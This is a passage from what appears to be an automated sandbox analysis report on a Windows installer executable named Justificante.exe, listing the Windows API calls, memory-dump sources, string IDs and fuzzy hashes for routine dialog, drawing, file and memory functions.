                          • SendMessageW.USER32(00000000), ref: 004047D4
                          • GetDlgItem.USER32(?,000003E8), ref: 004047FF
                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
                          • SetCursor.USER32(00000000), ref: 00404853
                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
                          • SetCursor.USER32(00000000), ref: 0040486F
                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                          • String ID: N$trikinse
                          • API String ID: 3103080414-331164461
                          • Opcode ID: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
                          • Instruction ID: 9740ae806e86bdd9a5d1823962a5ed5927fd13c96e858ba55e5d087808badbab
                          • Opcode Fuzzy Hash: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
                          • Instruction Fuzzy Hash: EE6193B1900209FFDB10AF60DD85E6A7B69FB84314F00853AFA05B62D1D7789D51CF98
                          APIs
                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
                          • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004061CC
                            • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                            • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                          • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 004061E9
                          • wsprintfA.USER32 ref: 00406207
                          • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
                          • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
                          • GlobalFree.KERNEL32(00000000), ref: 004062F0
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                            • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 00406036
                            • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                          • String ID: %ls=%ls$[Rename]$mB$uB$uB
                          • API String ID: 2171350718-2295842750
                          • Opcode ID: 59dc5e07b5800aef10481498d58bb421d24f26611c27dcb93450ce5172178df9
                          • Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
                          • Opcode Fuzzy Hash: 59dc5e07b5800aef10481498d58bb421d24f26611c27dcb93450ce5172178df9
                          • Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD
                          APIs
                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32(?,?), ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F
                          • API String ID: 941294808-1304234792
                          • Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                          • Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
                          • Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                          • Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4
                          APIs
                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                          • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                          • CharNextW.USER32(?,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                          • CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                          Strings
                          • *?|<>/":, xrefs: 0040683D
                          • "C:\Users\user\Desktop\Justificante.exe", xrefs: 004067EB
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-1776759244
                          • Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                          • Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
                          • Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                          • Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD
                          APIs
                          • GetWindowLongW.USER32(?,000000EB), ref: 00404516
                          • GetSysColor.USER32(00000000), ref: 00404554
                          • SetTextColor.GDI32(?,00000000), ref: 00404560
                          • SetBkMode.GDI32(?,?), ref: 0040456C
                          • GetSysColor.USER32(?), ref: 0040457F
                          • SetBkColor.GDI32(?,?), ref: 0040458F
                          • DeleteObject.GDI32(?), ref: 004045A9
                          • CreateBrushIndirect.GDI32(?), ref: 004045B3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                          • Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
                          • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                          • Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58
                          APIs
                          • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                            • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: File$Pointer$ByteCharMultiWide$Read
                          • String ID: 9
                          • API String ID: 163830602-2366072709
                          • Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                          • Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
                          • Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                          • Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                          APIs
                          • DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
                          • GetTickCount.KERNEL32 ref: 00402FFF
                          • wsprintfW.USER32 ref: 0040302D
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                            • Part of subcall function 004055A4: lstrcatW.KERNEL32(lgmnd,00403040,00403040,lgmnd,00000000,00000000,00000000), ref: 004055FF
                            • Part of subcall function 004055A4: SetWindowTextW.USER32(lgmnd,lgmnd), ref: 00405611
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                          • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00403051
                          • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                            • Part of subcall function 00402FAA: MulDiv.KERNEL32(00058721,00000064,0005ACD7), ref: 00402FBF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                          • String ID: ... %d%%
                          • API String ID: 722711167-2449383134
                          • Opcode ID: b05c67c46c87e700010054eae8e6e792e551e7c7e0ae3dcdbe65f70a63b6779b
                          • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
                          • Opcode Fuzzy Hash: b05c67c46c87e700010054eae8e6e792e551e7c7e0ae3dcdbe65f70a63b6779b
                          • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
                          • GetMessagePos.USER32 ref: 00404E70
                          • ScreenToClient.USER32(?,?), ref: 00404E8A
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                          • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                          • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                          • wsprintfW.USER32 ref: 00402F7D
                          • SetWindowTextW.USER32(?,?), ref: 00402F8D
                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402F9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                          • API String ID: 1451636040-1158693248
                          • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                          • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
                          • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                          • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                          • GlobalFree.KERNEL32(?), ref: 004029F0
                          • GlobalFree.KERNEL32(00000000), ref: 00402A03
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                          • String ID:
                          • API String ID: 2667972263-0
                          • Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                          • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
                          • Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                          • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
                          APIs
                          • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                          • wsprintfW.USER32 ref: 00404DE9
                          • SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s$H7B
                          • API String ID: 3540041739-107966168
                          • Opcode ID: afb352a5ceb1d4586ea2fc8411844f54738b02514fb4fb2e587bb31c0291c273
                          • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
                          • Opcode Fuzzy Hash: afb352a5ceb1d4586ea2fc8411844f54738b02514fb4fb2e587bb31c0291c273
                          • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00401D9A
                          • GetClientRect.USER32(?,?), ref: 00401DE5
                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                          • DeleteObject.GDI32(00000000), ref: 00401E39
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                          • Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
                          • Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                          • Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98
                          APIs
                          • GetDC.USER32(?), ref: 00401E51
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                          • ReleaseDC.USER32(?,00000000), ref: 00401E84
                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
